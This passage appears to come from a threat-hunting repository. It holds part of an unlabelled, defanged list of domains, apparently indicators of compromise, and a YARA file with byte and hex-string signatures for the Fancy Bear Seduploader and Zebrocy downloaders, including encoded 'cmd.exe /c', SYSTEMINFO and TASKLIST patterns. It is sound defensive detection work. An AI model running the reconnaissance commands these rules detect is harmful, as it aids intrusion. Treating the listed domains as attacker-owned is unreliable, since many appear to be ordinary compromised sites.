112 | buonabitare[.]com
113 | burg-zelem[.]de
114 | business-basic[.]de
115 | cac2040[.]com
116 | campusescalade[.]com
117 | cardsandloyalty[.]com
118 | carmel-york[.]com
119 | carsten[.]sparen-it[.]de
120 | cascinarosa33[.]it
121 | casinodepositors[.]com
122 | catchup-mag[.]com
123 | catering[.]com
124 | ceocenters[.]com
125 | cesep2019[.]com
126 | chainofhopeeurope[.]eu
127 | charlesfrancis[.]photos
128 | charlottelhanna[.]com
129 | chatterchatterchatter[.]com
130 | chinowarehousespace[.]com
131 | chorusconsulting[.]net
132 | chris-anne[.]com
133 | christopherhannan[.]com
134 | circlecitydj[.]com
135 | citydogslife[.]com
136 | cl0nazepamblog[.]com
137 | clinic-beethovenstrasse-ag[.]ch
138 | cmeow[.]com
139 | coachpreneuracademy[.]com
140 | collegetennis[.]info
141 | colored-shelves[.]com
142 | comoserescritor[.]com
143 | computer-place[.]de
144 | concontactodirecto[.]com
145 | condormobile[.]fr
146 | cops4causes[.]org
147 | cormanmarketing[.]com
148 | corporacionrr[.]com
149 | craftingalegacy[.]com
150 | craftron[.]com
151 | craftstone[.]co[.]nz
152 | crestgood[.]com
153 | crt[.]comodoca[.]com
154 | cssp-mediation[.]org
155 | cuadc[.]org
156 | curtsdiscountguns[.]com
157 | customroasts[.]com
158 | cxcompany[.]com
159 | cyberpromote[.]de
160 | dantreranch[.]com
161 | datatri[.]be
162 | daveystownhouse[.]com
163 | dcc-eu[.]com
164 | ddmgen[.]com
165 | deduktia[.]fi
166 | denhaagfoodie[.]nl
167 | dentalcircle[.]com
168 | dentourage[.]com
169 | denverwynkoopdentist[.]com
170 | devplus[.]be
171 | devus[.]de
172 | deziplan[.]ru
173 | diakonie-weitramsdorf-sesslach[.]de
174 | dibli[.]store
175 | dieetuniversiteit[.]nl
176 | dierenambulancealkmaar[.]nl
177 | dinecorp[.]com
178 | dinedrinkdetroit[.]com
179 | directique[.]com
180 | distrifresh[.]com
181 | dmlcpa[.]com
182 | dnqa[.]co[.]uk
183 | docarefoundation[.]org
184 | dogsunlimitedguide[.]com
185 | domaine-des-pothiers[.]com
186 | domilivefurniture[.]com
187 | drbrianhweeks[.]com
188 | dreamvoiceclub[.]org
189 | druktemakersheerenveen[.]nl
190 | drvoip[.]com
191 | eafx[.]pro
192 | eastgrinsteadwingchun[.]com
193 | easydental[.]ae
194 | edrickennedymacfoy[.]com
195 | edvestors[.]org
196 | efficiencyconsulting[.]es
197 | egpu[.]fr
198 | electricianul[.]com
199 | elitkeramika-shop[.]com[.]ua
200 | enactusnhlstenden[.]com
201 | endlessrealms[.]net
202 | endstarvation[.]com
203 | entdoctor-durban[.]com
204 | envomask[.]com
205 | epsondriversforwindows[.]com
206 | espaciopolitica[.]com
207 | etgdogz[.]de
208 | eurethicsport[.]eu
209 | explora[.]nl
210 | expohomes[.]com
211 | factorywizuk[.]com
212 | fann[.]ru
213 | fazagostar[.]co
214 | fbdate[.]me
215 | fbmagazine[.]ru
216 | finnergo[.]eu
217 | fire-space[.]com
218 | fla[.]se
219 | flossmoordental[.]com
220 | floweringsun[.]org
221 | fluzfluzrewards[.]com
222 | focuskontur[.]com
223 | foerderverein-vatterschule[.]de
224 | forextimes[.]ru
225 | forskolinslimeffect[.]net
226 | fotoslubna[.]com
227 | four-ways[.]com
228 | framemyballs[.]com
229 | frameshift[.]it
230 | fridakids[.]com
231 | frimec-international[.]es
232 | from02pro[.]com
233 | fsbforsale[.]com
234 | fskhjalmar[.]se
235 | fta-media[.]com
236 | funworx[.]de
237 | furland[.]ru
238 | galatee-couture[.]com
239 | gardenpartner[.]pl
240 | gatlinburgcottage[.]com
241 | gavelmasters[.]com
242 | gazelle-du-web[.]com
243 | gbk-tp1[.]de
244 | geitoniatonaggelon[.]gr
245 | girlish[.]ae
246 | glende-pflanzenparadies[.]de
247 | glennverschueren[.]be
248 | global-migrate[.]com
249 | globalcompliancenews[.]com
250 | globalskills[.]pt
251 | go[.]labibini[.]ch
252 | golfclublandgoednieuwkerk[.]nl
253 | goodboyscustom[.]com
254 | gosouldeep[.]com
255 | grancanariaregional[.]com
256 | graygreenbiomedservices[.]com
257 | greatofficespaces[.]net
258 | gsconcretecoatings[.]com
259 | gurutechnologies[.]net
260 | haard-totaal[.]nl
261 | happycatering[.]de
262 | harleystreetspineclinic[.]com
263 | hartofurniture[.]com
264 | haus-landliebe[.]de
265 | hawaiisteelbuilding[.]com
266 | heimdalbygg[.]no
267 | hekecrm[.]com
268 | hensleymarketing[.]com
269 | hepishopping[.]com
270 | heuvelland-oaze[.]nl
271 | hiddensee-buhne11[.]de
272 | hm-com[.]com
273 | hnkns[.]com
274 | holocine[.]de
275 | hospitalitytrainingsolutions[.]co[.]uk
276 | hostaletdelsindians[.]es
277 | hostastay[.]com
278 | hoteltantra[.]com
279 | humanviruses[.]org
280 | hvitfeldt[.]dk
281 | hypogenforensic[.]com
282 | ideamode[.]com
283 | iexpert99[.]com
284 | ikadomus[.]com
285 | ikzoekgod[.]be
286 | ilovefullcircle[.]com
287 | ilveshistoria[.]com
288 | imagine-entertainment[.]com
289 | imaginekithomes[.]co[.]nz
290 | imajyuku-sozoku[.]com
291 | indiebizadvocates[.]org
292 | innersurrection[.]com
293 | innervisions-id[.]com
294 | interlinkone[.]com
295 | internalresults[.]com
296 | invela[.]dk
297 | irizar[.]com
298 | iron-mine[.]ru
299 | istantidigitali[.]com
300 | ivancacu[.]com
301 | jaaphoekzema[.]nl
302 | jacquesgarcianoto[.]com
303 | jag[.]me
304 | jameswilliamspainting[.]com
305 | janasfokus[.]com
306 | jandhpest[.]com
307 | janmorgenstern[.]com
308 | jax-interim-and-projectmanagement[.]com
309 | jayfurnitureco[.]com
310 | jeanmonti[.]com
311 | jefersonalessandro[.]com
312 | jglconsultancy[.]com
313 | jimprattmediations[.]com
314 | jlwilsonbooks[.]com
315 | jmmartinezilustrador[.]com
316 | jobstomoveamerica[.]org
317 | johnkoen[.]com
318 | johnsonweekly[.]com
319 | johnstonmingmanning[.]com
320 | jollity[.]hu
321 | jonnyhooley[.]com
322 | juergenblaetz[.]de
323 | julielusktherapy[.]com
324 | justaroundthecornerpetsit[.]com
325 | k-v-f[.]de
326 | k-zubki[.]ru
327 | kafkacare[.]com
328 | karmeliterviertel[.]com
329 | katherinealy[.]com
330 | kausette[.]com
331 | kdbrh[.]com
332 | kemtron[.]fr
333 | kenmccallum[.]com
334 | kerstliedjeszingen[.]nl
335 | ketomealprep[.]academy
336 | keyboardjournal[.]com
337 | kickittickets[.]com
338 | kiraribeaute-nani[.]com
339 | kombi-dress[.]com
340 | koncept-m[.]ru
341 | krishnabrawijaya[.]com
342 | kristianboennelykke[.]dk
343 | kroophold-sjaelland[.]dk
344 | kryddersnapsen[.]dk
345 | kryptos72[.]com
346 | kuriero[.]pro
347 | kvetymichalovce[.]sk
348 | lagschools[.]ng
349 | landgoedspica[.]nl
350 | larchwoodmarketing[.]com
351 | lashandbrowenvy[.]com
352 | lassocrm[.]com
353 | lattalvor[.]com
354 | latteswithleslie[.]com
355 | lb[.]wordpress[.]com
356 | leadforensics[.]com
357 | leansupremegarcinia[.]net
358 | leatherjees[.]com
359 | legundschiess[.]de
360 | leloupblanc[.]gr
361 | leopoldineroux[.]com
362 | letsstopsmoking[.]co[.]uk
363 | levelseven[.]be
364 | levencovka[.]ru
365 | lexced[.]com
366 | lgiwines[.]com
367 | licensed-public-adjuster[.]com
368 | liepertgrafikweb[.]at
369 | limmortelyouth[.]com
370 | limounie[.]com
371 | line-x[.]co[.]uk
372 | linearete[.]com
373 | linkbuilding[.]life
374 | livedeveloper[.]com
375 | liveyourheartout[.]co
376 | lmmont[.]sk
377 | log-barn[.]co[.]uk
378 | logosindustries[.]com
379 | lollachiro[.]com
380 | look[.]academy
381 | lookandseen[.]com
382 | loparnille[.]se
383 | louiedager[.]com
384 | lovcase[.]com
385 | lovetzuchia[.]com
386 | ludoil[.]it
387 | lumturo[.]academy
388 | lunoluno[.]com
389 | luvbec[.]com
390 | lyricalduniya[.]com
391 | mahikuchen[.]com
392 | malzomattalar[.]com
393 | mamajenedesigns[.]com
394 | mangimirossana[.]it
395 | marcandy[.]com
396 | margaretmcshane[.]com
397 | mariannelemenestrel[.]com
398 | marmarabasin[.]com
399 | martinipstudios[.]com
400 | masecologicos[.]com
401 | matteoruzzaofficial[.]com
402 | maxcube24[.]com[.]ua
403 | mayprogulka[.]ru
404 | mazift[.]dk
405 | mbuildinghomes[.]com
406 | mediabolmong[.]com
407 | medicalsupportco[.]com
408 | memphishealthandwellness[.]com
409 | mensemetgesigte[.]co[.]za
410 | mercadodelrio[.]com
411 | metallbau-hartmann[.]eu
412 | metroton[.]ru
413 | michaelfiegel[.]com
414 | michal-s[.]co[.]il
415 | midwestschool[.]org
416 | mieleshopping[.]it
417 | mikegoodfellow[.]co[.]uk
418 | mind2muscle[.]nl
419 | mindfuelers[.]com
420 | mindsparkescape[.]com
421 | mneti[.]ru
422 | modamarfil[.]com
423 | moira-cristescu[.]com
424 | molade[.]nl
425 | molinum[.]pt
426 | mollymccarthydesign[.]com
427 | mondolandscapes[.]com
428 | monstarrsoccer[.]com
429 | morgansconsult[.]com
430 | motocrosshideout[.]com
431 | mrcar[.]nl
432 | mrkluttz[.]com
433 | mrmac[.]com
434 | mslp[.]org
435 | muller[.]nl
436 | mundo-pieces-auto[.]fr
437 | muni[.]pe
438 | mursall[.]de
439 | n-newmedia[.]de
440 | nalliasmali[.]net
441 | napisat-pismo-gubernatoru[.]ru
442 | nationnewsroom[.]com
443 | natturestaurante[.]com[.]br
444 | naukaip[.]ru
445 | nauticmarine[.]dk
446 | nbva[.]co[.]uk
447 | ncjc[.]ca
448 | nepal-pictures[.]com
449 | nepressurecleaning[.]com
450 | nevadaruralhousingstudies[.]org
451 | newonestop[.]com
452 | nginx[.]com
453 | nicksrock[.]com
454 | nieuwsindeklas[.]be
455 | ninjaki[.]com
456 | nourella[.]com
457 | nrgvalue[.]com
458 | ntinasfiloxenia[.]gr
459 | nuohous[.]com
460 | nutriwell[.]com[.]sg
461 | nvisionsigns[.]com
462 | nxtstg[.]org
463 | nykfdyrehospital[.]dk
464 | o2o-academy[.]com
465 | o90[.]dk
466 | ocduiblog[.]com
467 | olry-cloisons[.]fr
468 | omni[.]libertyeditions[.]com
469 | omnicademy[.]com
470 | oncarrot[.]com
471 | onesynergyinternational[.]com
472 | onlinemarketingsurgery[.]co[.]uk
473 | onlinetvgroup[.]com
474 | oportowebdesign[.]com
475 | opt4cdi[.]com
476 | opticahubertruiz[.]com
477 | oraweb[.]net
478 | orchardbrickwork[.]com
479 | osn[.]ro
480 | otpusk[.]zp[.]ua
481 | outstandingminialbums[.]com
482 | ownidentity[.]com
483 | ox-home[.]com
484 | p-ride[.]live
485 | paardcentraal[.]nl
486 | pajagus[.]fr
487 | palmecophilippines[.]com
488 | palmenhaus-erfurt[.]de
489 | paprikapod[.]com
490 | paradigmlandscape[.]com
491 | parisschool[.]ru
492 | parksideseniorliving[.]net
493 | patriotcleaning[.]net
494 | pays-saint-flour[.]fr
495 | pedmanson[.]com
496 | peninggibadan[.]co[.]id
497 | peppergreenfarmcatering[.]com[.]au
498 | perceptdecor[.]com
499 | perfectgrin[.]com
500 | phoenixcrane[.]com
501 | photonag[.]com
502 | phukienbepthanhdat[.]com
503 | pilotgreen[.]com
504 | pinthelook[.]com
505 | pisofare[.]co
506 | pixelhealth[.]net
507 | placermonticello[.]com
508 | plbinsurance[.]com
509 | precisetemp[.]com
510 | primemarineengineering[.]com
511 | pro-gamer[.]pl
512 | prodentalblue[.]com
513 | production-stills[.]co[.]uk
514 | projektparkiet[.]pl
515 | protoplay[.]ca
516 | publicompserver[.]de
517 | pureelements[.]nl
518 | putzen-reinigen[.]com
519 | pvandambv[.]nl
520 | pxsrl[.]it
521 | qandmmusiccenter[.]com
522 | qrs-international[.]com
523 | queertube[.]net
524 | quitescorting[.]com
525 | qwikcoach[.]com
526 | racefietsenblog[.]nl
527 | radishallgood[.]com
528 | raeoflightmusic[.]com
529 | ramirezprono[.]com
530 | randyabrown[.]com
531 | rapid5kloan[.]org
532 | rarefoods[.]ro
533 | rattanwarehouse[.]co[.]uk
534 | ravage-webzine[.]nl
535 | rechtenplicht[.]be
536 | redpebblephotography[.]com
537 | relevantonline[.]eu
538 | rename[.]kz
539 | renderbox[.]ch
540 | renehartman[.]nl
541 | rentingwell[.]com
542 | rentsportsequip[.]com
543 | reputation-medical[.]online
544 | reygroup[.]pt
545 | rhino-storage[.]co[.]uk
546 | richardiv[.]com
547 | richardkershawwines[.]co[.]za
548 | richardmaybury[.]co[.]uk
549 | riffenmattgarage[.]ch
550 | rino-gmbh[.]com
551 | rishigangoly[.]com
552 | rivermusic[.]nl
553 | rizplakatjaya[.]com
554 | rokthetalk[.]com
555 | ronaldhendriks[.]nl
556 | rozmata[.]com
557 | rs-danmark[.]dk
558 | rsidesigns[.]com
559 | rvside[.]com
560 | saberconcrete[.]com
561 | saboboxtel[.]uk
562 | sachainchiuk[.]com
563 | saint-malo-developpement[.]fr
564 | salonlamar[.]nl
565 | satoblog[.]org
566 | sber-biznes[.]com
567 | sbit[.]ag
568 | scentedlair[.]com
569 | schlagbohrmaschinetests[.]com
570 | scholarquotes[.]com
571 | schulz-moelln[.]de
572 | scotlandsroute66[.]co[.]uk
573 | sealgrinderpt[.]com
574 | selected-minds[.]de
575 | sellthewrightway[.]com
576 | sharonalbrightdds[.]com
577 | shrinkingplanet[.]com
578 | signededenroth[.]dk
579 | silkeight[.]com
580 | silverbird[.]dk
581 | simpleitsolutions[.]ch
582 | singletonfinancial[.]com
583 | site[.]markkit[.]com[.]br
584 | sjtpo[.]org
585 | skolaprome[.]eu
586 | slideevents[.]be
587 | smartercashsystem[.]com
588 | smartmind[.]net
589 | smartspeak[.]com
590 | smarttourism[.]academy
591 | so-sage[.]fr
592 | sochi-okna23[.]ru
593 | sololibrerie[.]it
594 | solutionshosting[.]co[.]uk
595 | soundseeing[.]net
596 | spacebel[.]be
597 | speakaudible[.]com
598 | speiserei-hannover[.]de
599 | spirello[.]nl
600 | springfieldplumbermo[.]com
601 | sprintcoach[.]com
602 | sshomme[.]com
603 | stage-infirmier[.]fr
604 | stagefxinc[.]com
605 | stanleyqualitysystems[.]com
606 | stoneridgemontessori[.]com
607 | stralsund-ansichten[.]de
608 | strauchs-wanderlust[.]info
609 | stressreliefadvice[.]com
610 | stringnosis[.]academy
611 | subquercy[.]fr
612 | successcolony[.]com[.]ng
613 | sunsolutions[.]es
614 | suonenjoen[.]fi
615 | supercarhire[.]co[.]uk
616 | sweetz[.]fr
617 | sycamoregreenapts[.]com
618 | t3brothers[.]com
619 | tages-geldvergleich[.]de
620 | tastevirginia[.]com
621 | tatyanakopieva[.]ru
622 | taulunkartano[.]fi
623 | tbalp[.]co[.]uk
624 | tchernia-conseil[.]fr
625 | teamsegeln[.]ch
626 | techybash[.]com
627 | tecleados[.]com
628 | teethinadaydentalimplants[.]com
629 | tellthebell[.]website
630 | terraflair[.]de
631 | test-teleachat[.]fr
632 | tetameble[.]pl
633 | teutoradio[.]de
634 | texanscan[.]org
635 | the-beauty-guides[.]com
636 | the-cupboard[.]co[.]uk
637 | the5thquestion[.]com
638 | theater-lueneburg[.]de
639 | theatre-embellie[.]fr
640 | theboardroomafrica[.]com
641 | thegrinningmanmusical[.]com
642 | thehovecounsellingpractice[.]co[.]uk
643 | theintellect[.]edu[.]pk
644 | thepixelfairy[.]com
645 | therapybusinessacademy[.]com
646 | thisprettyhair[.]com
647 | tieronechic[.]com
648 | tilldeeke[.]de
649 | topautoinsurers[.]net
650 | toranjtuition[.]org
651 | tothebackofthemoon[.]com
652 | towelroot[.]co
653 | trainiumacademy[.]com
654 | triavlete[.]com
655 | trivselsguide[.]dk
656 | turing[.]academy
657 | tutvracks[.]com
658 | tweedekansenloket[.]nl
659 | tzn[.]nu
660 | ufovidmag[.]com
661 | uncensoredhentaigif[.]com
662 | unexplored[.]gr
663 | unislaw-narty[.]pl
664 | utilisacteur[.]fr
665 | valiant-voice[.]com
666 | vapiano[.]fr
667 | vdolg24[.]online
668 | vedsegaard[.]dk
669 | verbouwingsdouche[.]nl
670 | victorvictoria[.]com
671 | vitoriaecoturismo[.]com[.]br
672 | vitormmcosta[.]com
673 | voetbalhoogeveen[.]nl
674 | voice2biz[.]com
675 | volta[.]plus
676 | vvego[.]com
677 | wademurray[.]com
678 | wallflowersandrakes[.]com
679 | watchsale[.]biz
680 | web865[.]com
681 | webforsites[.]com
682 | werkzeugtrolley[.]net
683 | wg-heiligenstadt[.]de
684 | whoopingcrane[.]com
685 | witraz[.]pl
686 | wordpress[.]idium[.]no
687 | wrinstitute[.]org
688 | www[.]bratek-immobilien[.]de
689 | www[.]buffdaddyblog[.]com
690 | www[.]hensleymarketing[.]com
691 | www[.]nginx[.]com
692 | www[.]placermonticello[.]com
693 | www[.]stagefxinc[.]com
694 | www[.]yournextshoes[.]com
695 | wyreforest[.]net
696 | xn--80abehgab4ak0ddz[.]xn--p1ai
697 | xn--80addfr4ahr[.]dp[.]ua
698 | xn--billigafrgpatroner-stb[.]se
699 | xrresources[.]com
700 | ya-elka[.]ru
701 | yayasanprimaunggul[.]org
702 | ygallerysalonsoho[.]com
703 | ykobbqchicken[.]ca
704 | yourcosmicbeing[.]com
705 | yourhappyevents[.]fr
706 | yournextshoes[.]com
707 | yuanshenghotel[.]com
708 | zaczytana[.]com
709 | zinnystar[.]com
710 | zorgboerderijravensbosch[.]nl
711 | zwemofficial[.]nl


--------------------------------------------------------------------------------
/threat_hunting/yara/tau_fancybear_downloader_public.yara:
--------------------------------------------------------------------------------
  1 | rule fancybear_seduploader_payload_decode_fns : TAU RU APT
  2 | {
  3 |   meta:
  4 |     author = "CarbonBlack Threat Research" // tharuyama
  5 |     date = "2018-Oct-29"
  6 |     description = "Designed to catch Seduploader"
  7 |     rule_version = 1
  8 | 	yara_version = "3.8.1"
  9 | 	Confidence = "Prod"
 10 | 	Priority = "High"
 11 |     TLP = "White"
 12 |     exemplar_hashes = "c3b2c7bbd2aa1e3100b9382ed78dfa0041af764e0e02013acdf282410b302ead, 1140c624fbfe28b9ef19fef2e9aa251adfbe8c157820d5f0356d88b4d80c2c88, ef027405492bc0719437eb58c3d2774cc87845f30c40040bbebbcc09a4e3dd18" 
 13 |     // the followings are own definitions   
 14 |     sample_md5 = "AA2CD9D9FC5D196CAA6F8FD5979E3F14"
 15 | 
 16 |   strings:
 17 |     // fn_decode_string  
 18 |     $0x10002f3f = { 55 8B EC 51 53 8B 5D 0C 56 8D 43 01 50 E8 ?? ?? ?? ?? 8B F0 33 C0 89 45 0C 59 85 DB }
 19 |     $0x10002f5d = { 57 8B 7D 08 2B FE }
 20 |     $0x10002f63 = { 8D 0C 30 C7 45 FC ?? ?? ?? ?? 33 D2 F7 75 FC 8A 82 ?? ?? ?? ?? 32 04 0F 88 01 8B 45 0C 40 89 45 0C 3B C3 }
 21 |     $0x10002f89 = { 8B C6 5E 5B 8B E5 5D C3 }
 22 |     // fn_rolling_xor
 23 |     $0x10002b9e = { 55 8B EC 56 8B 75 08 85 F6 }
 24 |     $0x10002ba9 = { 57 8B 7D 10 85 FF }
 25 |     $0x10002bb1 = { 83 7D 0C ?? 53 8B DE }
 26 |     $0x10002bbc = { 33 D2 8B C6 F7 75 14 8A 0C 3A 30 0B 43 46 3B 75 0C }
 27 |     $0x10002bd4 = { 8B C6 5E 5D C3 }    
 28 |   condition:
 29 |     all of them
 30 | }
 31 | 
 32 | rule fancybear_zebrocy_downloader2_cpp_fn_bs_decode : TAU RU APT
 33 | {
 34 |   meta:
 35 |     author = "CarbonBlack Threat Research" // tharuyama
 36 |     date = "2019-Mar-11"
 37 |     description = "Designed to catch Zebrocy Downloader Type 2 C++"
 38 |     rule_version = 1
 39 | 	yara_version = "3.8.1"
 40 | 	Confidence = "Prod"
 41 | 	Priority = "High"
 42 |     TLP = "White"
 43 |     exemplar_hashes = "489a1b13b5ec415f24bc4f1b4ed6c6e0bdc50ae95513645a839655bc75d4d9d6, 6f2589be92c2d0fa6050e52fbedb967c2590a8abbc4a9459fb7f78bc52407195"
 44 |     // own definitions
 45 |     sample_md5 = "CC6E8B89C8FD3DA84CFD747FB7BFEA79"
 46 |     function_address = "0x402410"
 47 |     function_name = "fn_bs_decode"
 48 |   strings:
 49 |     $0x402410 = { 55 8B EC 6A ?? 68 ?? ?? ?? ?? 64 A1 ?? ?? ?? ?? 50 83 EC ?? A1 ?? ?? ?? ?? 33 C5 89 45 ?? 53 56 50 8D 45 ?? 64 A3 ?? ?? ?? ?? 33 DB 89 7D ?? 89 5D ?? 6A ?? C7 45 ?? ?? ?? ?? ?? 53 8D 45 ?? 50 8D 4D ?? C7 45 ?? ?? ?? ?? ?? 89 5D ?? 88 5D ?? E8 ?? ?? ?? ?? 8B 55 ?? 8B 75 ?? 8B C6 83 FA }
 50 |     $0x402475 = { 8B 4D ?? 03 C8 8B C6 83 FA }
 51 |     $0x40248d = { 8A 10 8A 19 88 18 40 88 11 3B C1 }
 52 |     $0x40249c = { C7 45 ?? ?? ?? ?? ?? 89 5D ?? C6 45 ?? ?? C6 45 ?? ?? 89 5D ?? 39 5D }
 53 |     $0x4024b6 = { 83 7D ?? ?? 8B 45 }    
 54 |     $0x4024e0 = { 33 DB 6A ?? 53 8D 45 ?? BE ?? ?? ?? ?? 50 8D 4D ?? 89 75 ?? 89 5D ?? 88 5D ?? E8 ?? ?? ?? ?? C6 45 ?? ?? 89 77 ?? 89 5F ?? 88 1F 8B 45 ?? 8B 4F ?? 40 ?? ?? C7 45 ?? ?? ?? ?? ?? 3B C1 }
 55 |     $0x40251f = { 83 CE ?? 3B C8 }
 56 |     $0x402530 = { 8B D1 2B D0 83 FA }
 57 |     $0x402539 = { 8B F2 3B F3 }
 58 |     $0x40253f = { 8B 57 ?? 83 FA }
 59 |     $0x402558 = { 2B CE 2B C8 51 03 DE 03 D8 03 D0 53 52 E8 ?? ?? ?? ?? 8B 47 ?? 2B C6 83 C4 ?? 83 7F ?? ?? 89 47 }
 60 |     $0x40257b = { 8B 0F C6 04 01 }
 61 |     $0x402583 = { 8B CF C6 04 01 }
 62 |     $0x40258b = { 53 8B D8 2B D9 8B F7 E8 }
 63 |     $0x402597 = { 33 D2 33 F6 39 57 }
 64 |     $0x4025a4 = { 8B 5D ?? 8B 45 ?? 8B C8 83 FB }
 65 |     $0x4025c2 = { 0F BE 04 10 83 C0 }
 66 |     $0x4025d3 = { 0F BE 04 10 }
 67 |     $0x4025e3 = { C0 E0 ?? 88 04 31 8B 45 ?? 8B 5D ?? 8B CB 83 F8 }
 68 |     $0x402600 = { 83 F8 ?? 8B C3 }
 69 |     $0x40260a = { 0F BE 44 10 ?? 83 C0 }
 70 |     $0x402614 = { 83 F8 ?? 8B C3 }
 71 |     $0x40261e = { 0F BE 44 10 }
 72 |     $0x40262f = { 24 ?? 08 04 31 46 83 C2 ?? 3B 77 }
 73 |     $0x40264b = { 8B 4D ?? 51 E8 ?? ?? ?? ?? 83 C4 }    
 74 |     $0x40266b = { 8B 55 ?? 52 E8 ?? ?? ?? ?? 83 C4 }
 75 |     $0x40267c = { 8B 45 ?? 50 E8 ?? ?? ?? ?? 83 C4 }    
 76 |     $0x4026a6 = { 8B C7 8B 4D ?? 64 89 0D ?? ?? ?? ?? 59 5E 5B 8B 4D ?? 33 CD E8 ?? ?? ?? ?? 8B E5 5D C3 }
 77 |     $0x41f770 = { 8B 45 ?? 83 E0 }
 78 |     $0x41f77c = { 83 65 ?? ?? 8B 4D }
 79 |     $0x41f789 = { 8B 54 24 ?? 8D 42 ?? 8B 4A ?? 33 C8 E8 ?? ?? ?? ?? 8B 4A ?? 33 C8 E8 ?? ?? ?? ?? B8 }
 80 |   condition:
 81 |     all of them
 82 | }
 83 | 
 84 | rule fancybear_zebrocy_downloader1_delphi_v1 : TAU RU APT
 85 | {
 86 |   meta:
 87 |     author = "CarbonBlack Threat Research" // tharuyama
 88 |     date = "2019-Mar-11"
 89 |     description = "Designed to catch Zebrocy Downloader Type 1 Delphi (variant 1)"
 90 |     rule_version = 1
 91 | 	yara_version = "3.8.1"
 92 | 	Confidence = "Prod"
 93 | 	Priority = "High"
 94 |     TLP = "White"
 95 |     exemplar_hashes = "6ad3eb8b5622145a70bec67b3d14868a1c13864864afd651fe70689c95b1399a, 87f363afc9778efc78dd3e0ced112d8d66a09a8924091f0927ed02a7b64850d2"
 96 |   strings:  
 97 |     // fn_decode_string
 98 |     $0x6846c8 = { 55 8B EC 83 C4 ?? 33 C9 89 4D ?? 89 4D ?? 89 4D ?? 89 55 ?? 89 45 ?? 8B 45 ?? E8 ?? ?? ?? ?? 33 C0 55 68 ?? ?? ?? ?? 64 FF 30 64 89 20 8B 45 ?? E8 ?? ?? ?? ?? 8B 45 ?? 89 45 ?? 83 7D }
 99 |     $0x684709 = { 8B 45 ?? 83 E8 ?? 8B 00 89 45 }
100 |     $0x684714 = { 8B 45 ?? 85 C0 }
101 |     $0x68471b = { 89 45 ?? C7 45 }
102 |     $0x68472f = { 48 83 C8 ?? 40 }
103 |     $0x684737 = { 8D 45 ?? 50 B9 ?? ?? ?? ?? 8B 55 ?? 8B 45 ?? E8 ?? ?? ?? ?? 8B 4D ?? 8D 45 ?? BA ?? ?? ?? ?? E8 ?? ?? ?? ?? 8B 45 ?? E8 ?? ?? ?? ?? 8B D0 [0-1] 8D 45 ?? E8 ?? ?? ?? ?? 8B 55 ?? 8B 45 ?? E8 ?? ?? ?? ?? 8B 45 }    
104 |     $0x684784 = { 33 C0 5A 59 59 64 89 10 68 }
105 |     $0x684791 = { 8D 45 ?? BA ?? ?? ?? ?? E8 ?? ?? ?? ?? 8D 45 ?? E8 ?? ?? ?? ?? C3 }
106 |     $0x6847ae = { 8B E5 5D C3 }
107 |     // hex string
108 |     $hex_cmd = "636D642E657865202F6320" // cmd.exe /c
109 |     $hex_sysinfo = "53595354454D494E464F" // SYSTEMINFO
110 |     $hex_tasklst = "5441534B4C495354" // TASKLIST
111 |     $hex_winword = "77696E776F72642E657865" // winword.exe
112 |   condition:
113 |     all of ($0x684*) and any of ($hex*)
114 | }
115 | 
116 | rule fancybear_zebrocy_downloader1_delphi_v2 : TAU RU APT
117 | {
118 |   meta:
119 |     author = "CarbonBlack Threat Research" // tharuyama
120 |     date = "2019-Mar-11"
121 |     description = "Designed to catch Zebrocy Downloader Type 1 Delphi (variant 2)"
122 |     rule_version = 1
123 | 	yara_version = "3.8.1"
124 | 	Confidence = "Prod"
125 | 	Priority = "High"
126 |     TLP = "White"
127 |     exemplar_hashes = "65de07fc6b821d9fd3497cfa64212df2d39935dd515a86eda80d08086b183a3f, cd925e2464d251f02b4d425e301acf276e13eeccbbf5996ade5a6f355802abb7"
128 |   strings:
129 |     // fn_decode_string
130 |     $0x493840 = { 55 8B EC 33 C9 51 51 51 51 53 56 57 8B FA 89 45 ?? 8B 45 ?? E8 ?? ?? ?? ?? 33 C0 55 68 ?? ?? ?? ?? 64 FF 30 64 89 20 8B C7 E8 ?? ?? ?? ?? 8B 45 ?? 85 C0 }
131 |     $0x493875 = { 83 E8 ?? 8B 00 }
132 |     $0x49387a = { 8B F0 85 F6 }
133 |     $0x49388e = { 48 83 C8 ?? 40 }
134 |     $0x493896 = { 8D 45 ?? 50 B9 ?? ?? ?? ?? 8B D3 8B 45 ?? E8 ?? ?? ?? ?? 8B 4D ?? 8D 45 ?? BA ?? ?? ?? ?? E8 ?? ?? ?? ?? 8B 45 ?? E8 ?? ?? ?? ?? 8B D0 8D 45 ?? E8 ?? ?? ?? ?? 8B 55 ?? 8B C7 E8 }
135 |     $0x4938d9 = { 33 C0 5A 59 59 64 89 10 68 }
136 |     $0x4938e6 = { 8D 45 ?? BA ?? ?? ?? ?? E8 ?? ?? ?? ?? C3 }
137 |     $0x4938fb = { 5F 5E 5B 8B E5 5D C3 }
138 |     // hex string
139 |     $hex_word = "4D6963726F736F667420576F7264" // Microsoft Word
140 |     $hex_cmd = "636D642E657865202F6320" // cmd.exe /c
141 |     $hex_sysinfo = "53595354454D494E464F" // SYSTEMINFO
142 |     $hex_tasklst = "5441534B4C495354" // TASKLIST
143 |     $hex_total = "2C20546F74616C2073697A653A20" // , Total size:
144 |   condition:
145 |     all of ($0x4938*) and any of ($hex*)
146 | }
147 | 
148 | rule fancybear_zebrocy_downloader1_delphi_v3 : TAU RU APT
149 | {
150 |   meta:
151 |     author = "CarbonBlack Threat Research" // tharuyama
152 |     date = "2019-Mar-11"
153 |     description = "Designed to catch Zebrocy Downloader Type 1 Delphi (variant 3)"
154 |     rule_version = 1
155 | 	yara_version = "3.8.1"
156 | 	Confidence = "Prod"
157 | 	Priority = "High"
158 |     TLP = "White"
159 |     exemplar_hashes = "03ff895c99555f00792a41e3b014f16ef6b4bb0c74d1fa2237a6a9275e2b2109, 001cf7af29382f4f784fe45df131ca9e14908c6c0717899780f9354b8a5f0090"
160 |   strings:
161 |     // fn_decode_string
162 |     $0x4a1dcc = { 55 8B EC 6A ?? 6A ?? 6A ?? 6A ?? 53 56 57 8B F9 89 55 ?? 8B 45 ?? E8 ?? ?? ?? ?? 33 C0 55 68 ?? ?? ?? ?? 64 FF 30 64 89 20 8B C7 E8 ?? ?? ?? ?? 8B 45 ?? 85 C0 }
163 |     $0x4a1e03 = { 83 E8 ?? 8B 00 }
164 |     $0x4a1e08 = { 8B F0 85 F6 }
165 |     $0x4a1e1c = { 48 83 C8 ?? 40 }
